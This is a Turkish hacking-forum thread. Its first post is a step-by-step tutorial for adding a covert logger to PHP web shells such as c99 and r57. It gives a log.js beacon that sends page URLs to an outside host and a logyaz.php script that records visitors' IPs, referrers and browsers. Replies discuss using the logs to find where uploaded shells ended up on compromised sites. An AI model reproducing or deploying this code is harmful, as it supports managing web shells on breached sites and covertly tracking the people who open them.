Shellere Log Koyun (1 Viewer)

Credits
0
Rating - 0%
Öncelikle yapılması gerekenler ;

1-log.js dosyası oluşturmak
2-logyaz.php oluşturmak
3-loglar.txt oluşturmak

Yapılışı;
1- Öncelikle masa üstünde yeni bir metin belgesi acıp ismini log uzantısını .js yapıcaz yane log.js oluşturucaz ve içine bu kodları yazıcaz ;

log.js içine
a=new/**/Image();a.src='http://sitenizinadı.com/logyaz.php?a='+escape(location.href);

2- Şimdi 1.işlemdeki gibi metin belgesi oluşturup ismini logyaz.php şeklinde yapıp yeni bir php dosyası elde edelim.ve içine aşağıdaki kodları yazıp kayıt edelim.sonra kodlardaki spyhackerz.txt yazan yeri kendi isminizle yazın misal archavin.txt , BruteForce.txt şeklinde.
logyaz.php

<?php

$ip = $_SERVER['REMOTE_ADDR'];
$tarih = date('d.m.Y H:i:s');
$browser = getenv('HTTP_USER_AGENT');
$referans = $_SERVER['HTTP_REFERER'];
$kayit = fopen("spyhackerz.txt", "a");
fputs($kayit, "IP: $ip - TARIH: $tarih - Link: $referans - BROWSER: $browser \n ");
fclose($kayit);

?>

3- Şimdi logyaz.php kodlarında spyhackerz.txt yazmıştık siz isminizi yazdıysanız o isimde bir metin belgesi oluşturucaz içi boş olcak çünkü loglar buraya gelicek cool

Evet Log sistemimiz hazır Şimdi yapmamız gerekenler nelerdir ?

1-) Bu 3 dosyayı kendi sitemize sunucumuza yada free bir siteye Ftp yardımıyla Aktarıcaz.
-spyhackerz.txt nin okuma-yazma değeri ftpde 777 yapınız yoksa loglar yazılmaz
2-) Sonra Loglamak istediğimiz php dosyasını yada c99.php r57.php dosyasının içini acıp bu kodu koyucaz ;

shell içine eklenen kod
<SCRIPT SRC=http://sitenizinadı.com/log.js></SCRIPT>

Mectruy 

Not Gonna Get Us
Credits
201,695
Rating - 94.7%
ben yarın bunun panellisini veritabanlısını yapayım en iyisi.

Credits
0
Rating - 0%
aslında bunu farklı olarak ta kullana bilirsiniz bazı sistemlerde dosyanın nereye yuklendiği belli olmaz kendi kullandığınız shell in içine eğer bu kodu koyup yuklerseniz gelen loglardan shell in nerde olduğuda ortaya çıkar

B

Bybadboy

Ancak Bazı Sistemlerde loglu shelleri açmama durumu oluyor bizzat denedim önce aynı sheli logsuz attım açtı ardından js ekleyip yapınca beyaz ekran :)

Mectruy 

Not Gonna Get Us
Credits
201,695
Rating - 94.7%
Ancak Bazı Sistemlerde loglu shelleri açmama durumu oluyor bizzat denedim önce aynı sheli logsuz attım açtı ardından js ekleyip yapınca beyaz ekran :)
Log kodunu rast gele ekleme yoksa beyaz ekran verir hata verir. PHP yapısını bozacak bir alan olmamali

I

Isko~

Panelisini yapmistim hatta mectruy den yardim almistim bundan 1-2 sene once hatirlamiosam :) .js koydugun yer cok onemli, yanlis yerde olursa islem yapmaz :D

B

Bybadboy

Panelisini yapmistim hatta mectruy den yardim almistim bundan 1-2 sene once hatirlamiosam :) .js koydugun yer cok onemli, yanlis yerde olursa islem yapmaz :D
panellisi olsa daha çok iş görür :)

Users who are viewing this thread